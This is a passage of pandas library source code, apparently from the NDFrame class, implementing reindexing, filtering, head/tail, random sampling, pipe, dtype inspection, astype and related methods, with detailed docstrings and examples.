2010-01-06 88
2010-01-07 NaN
Please note that the ``NaN`` value present in the original dataframe
(at index value 2010-01-03) will not be filled by any of the
value propagation schemes. This is because filling while reindexing
does not look at dataframe values, but only compares the original and
desired indexes. If you do want to fill in the ``NaN`` values present
in the original dataframe, use the ``fillna()`` method.
See the :ref:`user guide <basics.reindexing>` for more.
Returns
-------
reindexed : %(klass)s
"""
# TODO: Decide if we care about having different examples for different
# kinds
@Appender(_shared_docs['reindex'] % dict(axes="axes", klass="NDFrame",
optional_labels="",
optional_axis=""))
def reindex(self, *args, **kwargs):
# construct the args
axes, kwargs = self._construct_axes_from_arguments(args, kwargs)
method = missing.clean_reindex_fill_method(kwargs.pop('method', None))
level = kwargs.pop('level', None)
copy = kwargs.pop('copy', True)
limit = kwargs.pop('limit', None)
tolerance = kwargs.pop('tolerance', None)
fill_value = kwargs.pop('fill_value', np.nan)
# Series.reindex doesn't use / need the axis kwarg
# We pop and ignore it here, to make writing Series/Frame generic code
# easier
kwargs.pop("axis", None)
if kwargs:
raise TypeError('reindex() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
self._consolidate_inplace()
# if all axes that are requested to reindex are equal, then only copy
# if indicated must have index names equal here as well as values
if all(self._get_axis(axis).identical(ax)
for axis, ax in axes.items() if ax is not None):
if copy:
return self.copy()
return self
# check if we are a multi reindex
if self._needs_reindex_multi(axes, method, level):
try:
return self._reindex_multi(axes, copy, fill_value)
except Exception:
pass
# perform the reindex on the axes
return self._reindex_axes(axes, level, limit, tolerance, method,
fill_value, copy).__finalize__(self)
def _reindex_axes(self, axes, level, limit, tolerance, method, fill_value,
copy):
"""Perform the reindex for all the axes."""
obj = self
for a in self._AXIS_ORDERS:
labels = axes[a]
if labels is None:
continue
ax = self._get_axis(a)
new_index, indexer = ax.reindex(labels, level=level, limit=limit,
tolerance=tolerance, method=method)
axis = self._get_axis_number(a)
obj = obj._reindex_with_indexers({axis: [new_index, indexer]},
fill_value=fill_value,
copy=copy, allow_dups=False)
return obj
def _needs_reindex_multi(self, axes, method, level):
"""Check if we do need a multi reindex."""
return ((com._count_not_none(*axes.values()) == self._AXIS_LEN) and
method is None and level is None and not self._is_mixed_type)
def _reindex_multi(self, axes, copy, fill_value):
return NotImplemented
_shared_docs[
'reindex_axis'] = ("""Conform input object to new index with optional
filling logic, placing NA/NaN in locations having no value in the
previous index. A new object is produced unless the new index is
equivalent to the current one and copy=False
Parameters
----------
labels : array-like
New labels / index to conform to. Preferably an Index object to
avoid duplicating data
axis : %(axes_single_arg)s
method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}, optional
Method to use for filling holes in reindexed DataFrame:
* default: don't fill gaps
* pad / ffill: propagate last valid observation forward to next
valid
* backfill / bfill: use next valid observation to fill gap
* nearest: use nearest valid observations to fill gap
copy : boolean, default True
Return a new object, even if the passed indexes are the same
level : int or name
Broadcast across a level, matching Index values on the
passed MultiIndex level
limit : int, default None
Maximum number of consecutive elements to forward or backward fill
tolerance : optional
Maximum distance between original and new labels for inexact
matches. The values of the index at the matching locations must
satisfy the equation ``abs(index[indexer] - target) <= tolerance``.
Tolerance may be a scalar value, which applies the same tolerance
to all values, or list-like, which applies variable tolerance per
element. List-like includes list, tuple, array, Series, and must be
the same size as the index and its dtype must exactly match the
index's type.
.. versionadded:: 0.21.0 (list-like tolerance)
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2], 'B': [3, 4]})
>>> df.reindex_axis(['A', 'B', 'C'], axis=1)
See Also
--------
reindex, reindex_like
Returns
-------
reindexed : %(klass)s
""")
@Appender(_shared_docs['reindex_axis'] % _shared_doc_kwargs)
def reindex_axis(self, labels, axis=0, method=None, level=None, copy=True,
limit=None, fill_value=np.nan):
msg = ("'.reindex_axis' is deprecated and will be removed in a future "
"version. Use '.reindex' instead.")
self._consolidate_inplace()
axis_name = self._get_axis_name(axis)
axis_values = self._get_axis(axis_name)
method = missing.clean_reindex_fill_method(method)
warnings.warn(msg, FutureWarning, stacklevel=3)
new_index, indexer = axis_values.reindex(labels, method, level,
limit=limit)
return self._reindex_with_indexers({axis: [new_index, indexer]},
fill_value=fill_value, copy=copy)
def _reindex_with_indexers(self, reindexers, fill_value=np.nan, copy=False,
allow_dups=False):
"""allow_dups indicates an internal call here """
# reindex doing multiple operations on different axes if indicated
new_data = self._data
for axis in sorted(reindexers.keys()):
index, indexer = reindexers[axis]
baxis = self._get_block_manager_axis(axis)
if index is None:
continue
index = _ensure_index(index)
if indexer is not None:
indexer = _ensure_int64(indexer)
# TODO: speed up on homogeneous DataFrame objects
new_data = new_data.reindex_indexer(index, indexer, axis=baxis,
fill_value=fill_value,
allow_dups=allow_dups,
copy=copy)
if copy and new_data is self._data:
new_data = new_data.copy()
return self._constructor(new_data).__finalize__(self)
def _reindex_axis(self, new_index, fill_method, axis, copy):
new_data = self._data.reindex_axis(new_index, axis=axis,
method=fill_method, copy=copy)
if new_data is self._data and not copy:
return self
else:
return self._constructor(new_data).__finalize__(self)
def filter(self, items=None, like=None, regex=None, axis=None):
"""
Subset rows or columns of dataframe according to labels in
the specified index.
Note that this routine does not filter a dataframe on its
contents. The filter is applied to the labels of the index.
Parameters
----------
items : list-like
List of info axis to restrict to (must not all be present)
like : string
Keep info axis where "arg in col == True"
regex : string (regular expression)
Keep info axis with re.search(regex, col) == True
axis : int or string axis name
The axis to filter on. By default this is the info axis,
'index' for Series, 'columns' for DataFrame
Returns
-------
same type as input object
Examples
--------
>>> df
one two three
mouse 1 2 3
rabbit 4 5 6
>>> # select columns by name
>>> df.filter(items=['one', 'three'])
one three
mouse 1 3
rabbit 4 6
>>> # select columns by regular expression
>>> df.filter(regex='e$', axis=1)
one three
mouse 1 3
rabbit 4 6
>>> # select rows containing 'bbi'
>>> df.filter(like='bbi', axis=0)
one two three
rabbit 4 5 6
See Also
--------
pandas.DataFrame.loc
Notes
-----
The ``items``, ``like``, and ``regex`` parameters are
enforced to be mutually exclusive.
``axis`` defaults to the info axis that is used when indexing
with ``[]``.
"""
import re
nkw = com._count_not_none(items, like, regex)
if nkw > 1:
raise TypeError('Keyword arguments `items`, `like`, or `regex` '
'are mutually exclusive')
if axis is None:
axis = self._info_axis_name
labels = self._get_axis(axis)
if items is not None:
name = self._get_axis_name(axis)
return self.reindex(
**{name: [r for r in items if r in labels]})
elif like:
def f(x):
return like in to_str(x)
values = labels.map(f)
return self.loc(axis=axis)[values]
elif regex:
def f(x):
return matcher.search(to_str(x)) is not None
matcher = re.compile(regex)
values = labels.map(f)
return self.loc(axis=axis)[values]
else:
raise TypeError('Must pass either `items`, `like`, or `regex`')
def head(self, n=5):
"""
Return the first `n` rows.
This function returns the first `n` rows for the object based
on position. It is useful for quickly testing if your object
has the right type of data in it.
Parameters
----------
n : int, default 5
Number of rows to select.
Returns
-------
obj_head : type of caller
The first `n` rows of the caller object.
See Also
--------
pandas.DataFrame.tail: Returns the last `n` rows.
Examples
--------
>>> df = pd.DataFrame({'animal':['alligator', 'bee', 'falcon', 'lion',
... 'monkey', 'parrot', 'shark', 'whale', 'zebra']})
>>> df
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the first 5 lines
>>> df.head()
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
Viewing the first `n` lines (three in this case)
>>> df.head(3)
animal
0 alligator
1 bee
2 falcon
"""
return self.iloc[:n]
def tail(self, n=5):
"""
Return the last `n` rows.
This function returns last `n` rows from the object based on
position. It is useful for quickly verifying data, for example,
after sorting or appending rows.
Parameters
----------
n : int, default 5
Number of rows to select.
Returns
-------
type of caller
The last `n` rows of the caller object.
See Also
--------
pandas.DataFrame.head : The first `n` rows of the caller object.
Examples
--------
>>> df = pd.DataFrame({'animal':['alligator', 'bee', 'falcon', 'lion',
... 'monkey', 'parrot', 'shark', 'whale', 'zebra']})
>>> df
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the last 5 lines
>>> df.tail()
animal
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the last `n` lines (three in this case)
>>> df.tail(3)
animal
6 shark
7 whale
8 zebra
"""
if n == 0:
return self.iloc[0:0]
return self.iloc[-n:]
def sample(self, n=None, frac=None, replace=False, weights=None,
random_state=None, axis=None):
"""
Return a random sample of items from an axis of object.
You can use `random_state` for reproducibility.
Parameters
----------
n : int, optional
Number of items from axis to return. Cannot be used with `frac`.
Default = 1 if `frac` = None.
frac : float, optional
Fraction of axis items to return. Cannot be used with `n`.
replace : boolean, optional
Sample with or without replacement. Default = False.
weights : str or ndarray-like, optional
Default 'None' results in equal probability weighting.
If passed a Series, will align with target object on index. Index
values in weights not found in sampled object will be ignored and
index values in sampled object not in weights will be assigned
weights of zero.
If called on a DataFrame, will accept the name of a column
when axis = 0.
Unless weights are a Series, weights must be same length as axis
being sampled.
If weights do not sum to 1, they will be normalized to sum to 1.
Missing values in the weights column will be treated as zero.
inf and -inf values not allowed.
random_state : int or numpy.random.RandomState, optional
Seed for the random number generator (if int), or numpy RandomState
object.
axis : int or string, optional
Axis to sample. Accepts axis number or name. Default is stat axis
for given data type (0 for Series and DataFrames, 1 for Panels).
Returns
-------
A new object of same type as caller.
Examples
--------
Generate an example ``Series`` and ``DataFrame``:
>>> s = pd.Series(np.random.randn(50))
>>> s.head()
0 -0.038497
1 1.820773
2 -0.972766
3 -1.598270
4 -1.095526
dtype: float64
>>> df = pd.DataFrame(np.random.randn(50, 4), columns=list('ABCD'))
>>> df.head()
A B C D
0 0.016443 -2.318952 -0.566372 -1.028078
1 -1.051921 0.438836 0.658280 -0.175797
2 -1.243569 -0.364626 -0.215065 0.057736
3 1.768216 0.404512 -0.385604 -1.457834
4 1.072446 -1.137172 0.314194 -0.046661
Next extract a random sample from both of these objects...
3 random elements from the ``Series``:
>>> s.sample(n=3)
27 -0.994689
35   -1.049016
42   -0.224565
dtype: float64
And a random 10% of the ``DataFrame`` with replacement:
>>> df.sample(frac=0.1, replace=True)
A B C D
35 1.981780 0.142106 1.817165 -0.290805
49 -1.336199 -0.448634 -0.789640 0.217116
40 0.823173 -0.078816 1.009536 1.015108
15 1.421154 -0.055301 -1.922594 -0.019696
6 -0.148339 0.832938 1.787600 -1.383767
You can use `random_state` for reproducibility:
>>> df.sample(n=5, random_state=1)
A B C D
37 -2.027662 0.103611 0.237496 -0.165867
43 -0.259323 -0.583426 1.516140 -0.479118
12 -1.686325 -0.579510 0.985195 -0.460286
8 1.167946 0.429082 1.215742 -1.636041
9 1.197475 -0.864188 1.554031 -1.505264
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
axis_length = self.shape[axis]
# Process random_state argument
rs = com._random_state(random_state)
# Check weights for compliance
if weights is not None:
# If a series, align with frame
if isinstance(weights, pd.Series):
weights = weights.reindex(self.axes[axis])
# Strings acceptable if a dataframe and axis = 0
if isinstance(weights, string_types):
if isinstance(self, pd.DataFrame):
if axis == 0:
try:
weights = self[weights]
except KeyError:
raise KeyError("String passed to weights not a "
"valid column")
else:
raise ValueError("Strings can only be passed to "
"weights when sampling from rows on "
"a DataFrame")
else:
raise ValueError("Strings cannot be passed as weights "
"when sampling from a Series or Panel.")
weights = pd.Series(weights, dtype='float64')
if len(weights) != axis_length:
raise ValueError("Weights and axis to be sampled must be of "
"same length")
if (weights == np.inf).any() or (weights == -np.inf).any():
raise ValueError("weight vector may not include `inf` values")
if (weights < 0).any():
raise ValueError("weight vector many not include negative "
"values")
# If has nan, set to zero.
weights = weights.fillna(0)
# Renormalize if don't sum to 1
if weights.sum() != 1:
if weights.sum() != 0:
weights = weights / weights.sum()
else:
raise ValueError("Invalid weights: weights sum to zero")
weights = weights.values
# If no frac or n, default to n=1.
if n is None and frac is None:
n = 1
elif n is not None and frac is None and n % 1 != 0:
raise ValueError("Only integers accepted as `n` values")
elif n is None and frac is not None:
n = int(round(frac * axis_length))
elif n is not None and frac is not None:
raise ValueError('Please enter a value for `frac` OR `n`, not '
'both')
# Check for negative sizes
if n < 0:
raise ValueError("A negative number of rows requested. Please "
"provide positive value.")
locs = rs.choice(axis_length, size=n, replace=replace, p=weights)
return self.take(locs, axis=axis, is_copy=False)
_shared_docs['pipe'] = (r"""
Apply func(self, \*args, \*\*kwargs)
Parameters
----------
func : function
function to apply to the %(klass)s.
``args``, and ``kwargs`` are passed into ``func``.
Alternatively a ``(callable, data_keyword)`` tuple where
``data_keyword`` is a string indicating the keyword of
``callable`` that expects the %(klass)s.
args : iterable, optional
positional arguments passed into ``func``.
kwargs : mapping, optional
a dictionary of keyword arguments passed into ``func``.
Returns
-------
object : the return type of ``func``.
Notes
-----
Use ``.pipe`` when chaining together functions that expect
Series, DataFrames or GroupBy objects. Instead of writing
>>> f(g(h(df), arg1=a), arg2=b, arg3=c)
You can write
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe(f, arg2=b, arg3=c)
... )
If you have a function that takes the data as (say) the second
argument, pass a tuple indicating which keyword expects the
data. For example, suppose ``f`` takes its data as ``arg2``:
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe((f, 'arg2'), arg1=a, arg3=c)
... )
See Also
--------
pandas.DataFrame.apply
pandas.DataFrame.applymap
pandas.Series.map
""")
@Appender(_shared_docs['pipe'] % _shared_doc_kwargs)
def pipe(self, func, *args, **kwargs):
return com._pipe(self, func, *args, **kwargs)
_shared_docs['aggregate'] = ("""
Aggregate using one or more operations over the specified axis.
%(versionadded)s
Parameters
----------
func : function, string, dictionary, or list of string/functions
Function to use for aggregating the data. If a function, must either
work when passed a %(klass)s or when passed to %(klass)s.apply. For
a DataFrame, can pass a dict, if the keys are DataFrame column names.
Accepted combinations are:
- string function name.
- function.
- list of functions.
- dict of column names -> functions (or list of functions).
%(axis)s
*args
Positional arguments to pass to `func`.
**kwargs
Keyword arguments to pass to `func`.
Returns
-------
aggregated : %(klass)s
Notes
-----
`agg` is an alias for `aggregate`. Use the alias.
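Examples
--------
A minimal sketch (illustrative only; the small DataFrame below is assumed):
>>> df = pd.DataFrame({'A': [1, 2], 'B': [3, 4]})
>>> df.agg('sum')
A    3
B    7
dtype: int64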
""")
_shared_docs['transform'] = ("""
Call function producing a like-indexed %(klass)s
and return a %(klass)s with the transformed values
.. versionadded:: 0.20.0
Parameters
----------
func : callable, string, dictionary, or list of string/callables
To apply to column
Accepted Combinations are:
- string function name
- function
- list of functions
- dict of column names -> functions (or list of functions)
Returns
-------
transformed : %(klass)s
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'],
... index=pd.date_range('1/1/2000', periods=10))
>>> df.iloc[3:7] = np.nan
>>> df.transform(lambda x: (x - x.mean()) / x.std())
A B C
2000-01-01 0.579457 1.236184 0.123424
2000-01-02 0.370357 -0.605875 -1.231325
2000-01-03 1.455756 -0.277446 0.288967
2000-01-04 NaN NaN NaN
2000-01-05 NaN NaN NaN
2000-01-06 NaN NaN NaN
2000-01-07 NaN NaN NaN
2000-01-08 -0.498658 1.274522 1.642524
2000-01-09 -0.540524 -1.012676 -0.828968
2000-01-10 -1.366388 -0.614710 0.005378
See also
--------
pandas.%(klass)s.aggregate
pandas.%(klass)s.apply
""")
# ----------------------------------------------------------------------
# Attribute access
def __finalize__(self, other, method=None, **kwargs):
"""
Propagate metadata from other to self.
Parameters
----------
other : the object from which to get the attributes that we are going
to propagate
method : optional, a passed method name ; possibly to take different
types of propagation actions based on this
"""
if isinstance(other, NDFrame):
for name in self._metadata:
object.__setattr__(self, name, getattr(other, name, None))
return self
def __getattr__(self, name):
"""After regular attribute access, try looking up the name
This allows simpler access to columns for interactive use.
"""
# Note: obj.x will always call obj.__getattribute__('x') prior to
# calling obj.__getattr__('x').
if (name in self._internal_names_set or name in self._metadata or
name in self._accessors):
return object.__getattribute__(self, name)
else:
if name in self._info_axis:
return self[name]
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
"""After regular attribute access, try setting the name
This allows simpler access to columns for interactive use.
"""
# first try regular attribute access via __getattribute__, so that
# e.g. ``obj.x`` and ``obj.x = 4`` will always reference/modify
# the same attribute.
try:
object.__getattribute__(self, name)
return object.__setattr__(self, name, value)
except AttributeError:
pass
# if this fails, go on to more involved attribute setting
# (note that this matches __getattr__, above).
if name in self._internal_names_set:
object.__setattr__(self, name, value)
elif name in self._metadata:
object.__setattr__(self, name, value)
else:
try:
existing = getattr(self, name)
if isinstance(existing, Index):
object.__setattr__(self, name, value)
elif name in self._info_axis:
self[name] = value
else:
object.__setattr__(self, name, value)
except (AttributeError, TypeError):
if isinstance(self, ABCDataFrame) and (is_list_like(value)):
warnings.warn("Pandas doesn't allow columns to be "
"created via a new attribute name - see "
"https://pandas.pydata.org/pandas-docs/"
"stable/indexing.html#attribute-access",
stacklevel=2)
object.__setattr__(self, name, value)
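# Usage sketch (comments only, illustrative; a DataFrame ``df`` with an
# existing column 'a' is assumed):
#   df.a           # __getattr__ falls back to column lookup, like df['a']
#   df.a = [5, 6]  # existing column name: routed to df['a'] = [5, 6]
#   df.b = [5, 6]  # unknown name: sets a plain instance attribute and emits
#                  # a UserWarning for list-like values on a DataFrame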
# ----------------------------------------------------------------------
# Getting and setting elements
# ----------------------------------------------------------------------
# Consolidation of internals
def _protect_consolidate(self, f):
"""Consolidate _data -- if the blocks have changed, then clear the
cache
"""
blocks_before = len(self._data.blocks)
result = f()
if len(self._data.blocks) != blocks_before:
self._clear_item_cache()
return result
def _consolidate_inplace(self):
"""Consolidate data in place and return None"""
def f():
self._data = self._data.consolidate()
self._protect_consolidate(f)
def _consolidate(self, inplace=False):
"""
Compute NDFrame with "consolidated" internals (data of each dtype
grouped together in a single ndarray).
Parameters
----------
inplace : boolean, default False
If False return new object, otherwise modify existing object
Returns
-------
consolidated : type of caller
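Examples
--------
Illustrative sketch (not from the upstream docstring); building a frame
column by column leaves one block per column until consolidation:
>>> df = pd.DataFrame({'a': [1, 2]})
>>> df['b'] = [3, 4]
>>> len(df._data.blocks)
2
>>> len(df._consolidate()._data.blocks)
1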
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if inplace:
self._consolidate_inplace()
else:
f = lambda: self._data.consolidate()
cons_data = self._protect_consolidate(f)
return self._constructor(cons_data).__finalize__(self)
def consolidate(self, inplace=False):
"""Compute NDFrame with "consolidated" internals (data of each dtype
grouped together in a single ndarray).
.. deprecated:: 0.20.0
Consolidate will be an internal implementation only.
"""
# 15483
warnings.warn("consolidate is deprecated and will be removed in a "
"future release.", FutureWarning, stacklevel=2)
return self._consolidate(inplace)
@property
def _is_mixed_type(self):
f = lambda: self._data.is_mixed_type
return self._protect_consolidate(f)
@property
def _is_numeric_mixed_type(self):
f = lambda: self._data.is_numeric_mixed_type
return self._protect_consolidate(f)
@property
def _is_datelike_mixed_type(self):
f = lambda: self._data.is_datelike_mixed_type
return self._protect_consolidate(f)
def _check_inplace_setting(self, value):
""" check whether we allow in-place setting with this type of value """
if self._is_mixed_type:
if not self._is_numeric_mixed_type:
# allow an actual np.nan thru
try:
if np.isnan(value):
return True
except Exception:
pass
raise TypeError('Cannot do inplace boolean setting on '
'mixed-types with a non np.nan value')
return True
def _get_numeric_data(self):
return self._constructor(
self._data.get_numeric_data()).__finalize__(self)
def _get_bool_data(self):
return self._constructor(self._data.get_bool_data()).__finalize__(self)
# ----------------------------------------------------------------------
# Internal Interface Methods
def as_matrix(self, columns=None):
"""Convert the frame to its Numpy-array representation.
.. deprecated:: 0.23.0
Use :meth:`DataFrame.values` instead.
Parameters
----------
columns: list, optional, default:None
If None, return all columns, otherwise, returns specified columns.
Returns
-------
values : ndarray
If the caller is heterogeneous and contains booleans or objects,
the result will be of dtype=object. See Notes.
Notes
-----
Return is NOT a Numpy-matrix, rather, a Numpy-array.
The dtype will be a lower-common-denominator dtype (implicit
upcasting); that is to say if the dtypes (even of numeric types)
are mixed, the one that accommodates all will be chosen. Use this
with care if you are not dealing with the blocks.
e.g. If the dtypes are float16 and float32, dtype will be upcast to
float32. If dtypes are int32 and uint8, dtype will be upcast to
int32. By numpy.find_common_type convention, mixing int64 and uint64
will result in a float64 dtype.
This method is provided for backwards compatibility. Generally,
it is recommended to use '.values'.
See Also
--------
pandas.DataFrame.values
"""
warnings.warn("Method .as_matrix will be removed in a future version. "
"Use .values instead.", FutureWarning, stacklevel=2)
self._consolidate_inplace()
return self._data.as_array(transpose=self._AXIS_REVERSED,
items=columns)
@property
def values(self):
"""
Return a Numpy representation of the DataFrame.
Only the values in the DataFrame will be returned, the axes labels
will be removed.
Returns
-------
numpy.ndarray
The values of the DataFrame.
Examples
--------
A DataFrame where all columns are the same type (e.g., int64) results
in an array of the same type.
>>> df = pd.DataFrame({'age': [ 3, 29],
... 'height': [94, 170],
... 'weight': [31, 115]})
>>> df
age height weight
0 3 94 31
1 29 170 115
>>> df.dtypes
age int64
height int64
weight int64
dtype: object
>>> df.values
array([[ 3, 94, 31],
[ 29, 170, 115]], dtype=int64)
A DataFrame with mixed type columns(e.g., str/object, int64, float32)
results in an ndarray of the broadest type that accommodates these
mixed types (e.g., object).
>>> df2 = pd.DataFrame([('parrot', 24.0, 'second'),
... ('lion', 80.5, 1),
... ('monkey', np.nan, None)],
... columns=('name', 'max_speed', 'rank'))
>>> df2.dtypes
name object
max_speed float64
rank object
dtype: object
>>> df2.values
array([['parrot', 24.0, 'second'],
['lion', 80.5, 1],
['monkey', nan, None]], dtype=object)
Notes
-----
The dtype will be a lower-common-denominator dtype (implicit
upcasting); that is to say if the dtypes (even of numeric types)
are mixed, the one that accommodates all will be chosen. Use this
with care if you are not dealing with the blocks.
e.g. If the dtypes are float16 and float32, dtype will be upcast to
float32. If dtypes are int32 and uint8, dtype will be upcast to
int32. By :func:`numpy.find_common_type` convention, mixing int64
and uint64 will result in a float64 dtype.
See Also
--------
pandas.DataFrame.index : Retrieve the index labels
pandas.DataFrame.columns : Retrieve the column names
"""
self._consolidate_inplace()
return self._data.as_array(transpose=self._AXIS_REVERSED)
@property
def _values(self):
"""internal implementation"""
return self.values
@property
def _get_values(self):
# compat
return self.values
def get_values(self):
"""
Return an ndarray after converting sparse values to dense.
This is the same as ``.values`` for non-sparse data. For sparse
data contained in a `pandas.SparseArray`, the data are first
converted to a dense representation.
Returns
-------
numpy.ndarray
Numpy representation of DataFrame
See Also
--------
values : Numpy representation of DataFrame.
pandas.SparseArray : Container for sparse data.
Examples
--------
>>> df = pd.DataFrame({'a': [1, 2], 'b': [True, False],
... 'c': [1.0, 2.0]})
>>> df
a b c
0 1 True 1.0
1 2 False 2.0
>>> df.get_values()
array([[1, True, 1.0], [2, False, 2.0]], dtype=object)
>>> df = pd.DataFrame({"a": pd.SparseArray([1, None, None]),
... "c": [1.0, 2.0, 3.0]})
>>> df
a c
0 1.0 1.0
1 NaN 2.0
2 NaN 3.0
>>> df.get_values()
array([[ 1., 1.],
[nan, 2.],
[nan, 3.]])
"""
return self.values
def get_dtype_counts(self):
"""
Return counts of unique dtypes in this object.
Returns
-------
dtype : Series
Series with the count of columns with each dtype.
See Also
--------
dtypes : Return the dtypes in this object.
Examples
--------
>>> a = [['a', 1, 1.0], ['b', 2, 2.0], ['c', 3, 3.0]]
>>> df = pd.DataFrame(a, columns=['str', 'int', 'float'])
>>> df
str int float
0 a 1 1.0
1 b 2 2.0
2 c 3 3.0
>>> df.get_dtype_counts()
float64 1
int64 1
object 1
dtype: int64
"""
from pandas import Series
return Series(self._data.get_dtype_counts())
def get_ftype_counts(self):
"""
Return counts of unique ftypes in this object.
.. deprecated:: 0.23.0
This is useful for SparseDataFrame or for DataFrames containing
sparse arrays.
Returns
-------
dtype : Series
Series with the count of columns with each type and
sparsity (dense/sparse)
See Also
--------
ftypes : Return ftypes (indication of sparse/dense and dtype) in
this object.
Examples
--------
>>> a = [['a', 1, 1.0], ['b', 2, 2.0], ['c', 3, 3.0]]
>>> df = pd.DataFrame(a, columns=['str', 'int', 'float'])
>>> df
str int float
0 a 1 1.0
1 b 2 2.0
2 c 3 3.0
>>> df.get_ftype_counts()
float64:dense 1
int64:dense 1
object:dense 1
dtype: int64
"""
warnings.warn("get_ftype_counts is deprecated and will "
"be removed in a future version",
FutureWarning, stacklevel=2)
from pandas import Series
return Series(self._data.get_ftype_counts())
@property
def dtypes(self):
"""
Return the dtypes in the DataFrame.
This returns a Series with the data type of each column.
The result's index is the original DataFrame's columns. Columns
with mixed types are stored with the ``object`` dtype. See
:ref:`the User Guide <basics.dtypes>` for more.
Returns
-------
pandas.Series
The data type of each column.
See Also
--------
pandas.DataFrame.ftypes : dtype and sparsity information.
Examples
--------
>>> df = pd.DataFrame({'float': [1.0],
... 'int': [1],
... 'datetime': [pd.Timestamp('20180310')],
... 'string': ['foo']})
>>> df.dtypes
float float64
int int64
datetime datetime64[ns]
string object
dtype: object
"""
from pandas import Series
return Series(self._data.get_dtypes(), index=self._info_axis,
dtype=np.object_)
@property
def ftypes(self):
"""
Return the ftypes (indication of sparse/dense and dtype) in DataFrame.
This returns a Series with the data type of each column.
The result's index is the original DataFrame's columns. Columns
with mixed types are stored with the ``object`` dtype. See
:ref:`the User Guide <basics.dtypes>` for more.
Returns
-------
pandas.Series
The data type and indication of sparse/dense of each column.
See Also
--------
pandas.DataFrame.dtypes: Series with just dtype information.
pandas.SparseDataFrame : Container for sparse tabular data.
Notes
-----
Sparse data should have the same dtypes as its dense representation.
Examples
--------
>>> import numpy as np
>>> arr = np.random.RandomState(0).randn(100, 4)
>>> arr[arr < .8] = np.nan
>>> pd.DataFrame(arr).ftypes
0 float64:dense
1 float64:dense
2 float64:dense
3 float64:dense
dtype: object
>>> pd.SparseDataFrame(arr).ftypes
0 float64:sparse
1 float64:sparse
2 float64:sparse
3 float64:sparse
dtype: object
"""
from pandas import Series
return Series(self._data.get_ftypes(), index=self._info_axis,
dtype=np.object_)
def as_blocks(self, copy=True):
"""
Convert the frame to a dict of dtype -> Constructor Types that each has
a homogeneous dtype.
.. deprecated:: 0.21.0
NOTE: the dtypes of the blocks WILL BE PRESERVED HERE (unlike in
as_matrix)
Parameters
----------
copy : boolean, default True
Returns
-------
values : a dict of dtype -> Constructor Types
"""
warnings.warn("as_blocks is deprecated and will "
"be removed in a future version",
FutureWarning, stacklevel=2)
return self._to_dict_of_blocks(copy=copy)
@property
def blocks(self):
"""
Internal property, property synonym for as_blocks()
.. deprecated:: 0.21.0
"""
return self.as_blocks()
def _to_dict_of_blocks(self, copy=True):
"""
Return a dict of dtype -> Constructor Types that
each is a homogeneous dtype.
Internal ONLY
"""
return {k: self._constructor(v).__finalize__(self)
for k, v, in self._data.to_dict(copy=copy).items()}
@deprecate_kwarg(old_arg_name='raise_on_error', new_arg_name='errors',
mapping={True: 'raise', False: 'ignore'})
def astype(self, dtype, copy=True, errors='raise', **kwargs):
"""
Cast a pandas object to a specified dtype ``dtype``.
Parameters
----------
dtype : data type, or dict of column name -> data type
Use a numpy.dtype or Python type to cast entire pandas object to
the same type. Alternatively, use {col: dtype, ...}, where col is a
column label and dtype is a numpy.dtype or Python type to cast one
or more of the DataFrame's columns to column-specific types.
copy : bool, default True.
Return a copy when ``copy=True`` (be very careful setting
``copy=False`` as changes to values then may propagate to other
pandas objects).
errors : {'raise', 'ignore'}, default 'raise'.
Control raising of exceptions on invalid data for provided dtype.
- ``raise`` : allow exceptions to be raised
- ``ignore`` : suppress exceptions. On error return original object
.. versionadded:: 0.20.0
raise_on_error : raise on invalid input
.. deprecated:: 0.20.0
Use ``errors`` instead
kwargs : keyword arguments to pass on to the constructor
Returns
-------
casted : type of caller
Examples
--------
>>> ser = pd.Series([1, 2], dtype='int32')
>>> ser
0 1
1 2
dtype: int32
>>> ser.astype('int64')
0 1
1 2
dtype: int64
Convert to categorical type:
>>> ser.astype('category')
0 1
1 2
dtype: category
Categories (2, int64): [1, 2]
Convert to ordered categorical type with custom ordering:
>>> ser.astype('category', ordered=True, categories=[2, 1])
0 1
1 2
dtype: category
Categories (2, int64): [2 < 1]
Note that using ``copy=False`` and changing data on a new
pandas object may propagate changes:
>>> s1 = pd.Series([1,2])
>>> s2 = s1.astype('int64', copy=False)
>>> s2[0] = 10
>>> s1 # note that s1[0] has changed too
0 10
1 2
dtype: int64
See also
--------
pandas.to_datetime : Convert argument to datetime.
pandas.to_timedelta : Convert argument to timedelta.
pandas.to_numeric : Convert argument to a numeric type.
numpy.ndarray.astype : Cast a numpy array to a specified type.
"""
if is_dict_like(dtype):
if self.ndim == 1: # i.e. Series
if len(dtype) > 1 or self.name not in dtype:
raise KeyError('Only the Series name can be used for '
'the key in Series dtype mappings.')
new_type = dtype[self.name]
return self.astype(new_type, copy, errors, **kwargs)
elif self.ndim > 2:
raise NotImplementedError(
'astype() only accepts a dtype arg of type dict when '
'invoked on Series and DataFrames. A single dtype must be '
'specified when invoked on a Panel.'
)
for col_name in dtype.keys():
if col_name not in self:
raise KeyError('Only a column name can be used for the '
'key in a dtype mappings argument.')
results = []
for col_name, col in self.iteritems():
if col_name in dtype:
results.append(col.astype(dtype[col_name], copy=copy))
else:
results.append(col.copy() if copy else col)
elif is_categorical_dtype(dtype) and self.ndim > 1:
# GH 18099: columnwise conversion to categorical
results = (self[col].astype(dtype, copy=copy) for col in self)
else:
# else, only a single dtype is given
new_data = self._data.astype(dtype=dtype, copy=copy, errors=errors,
**kwargs)
return self._constructor(new_data).__finalize__(self)
# GH 19920: retain column metadata after concat
result = pd.concat(results, axis=1, copy=False)
result.columns = self.columns
return result
def copy(self, deep=True):
"""
Make a copy of this object's indices and data.
When ``deep=True`` (default), a new object will be created with a
copy of the calling object's data and indices. Modifications to
the data or indices of the copy will not be reflected in the
original object (see notes below).
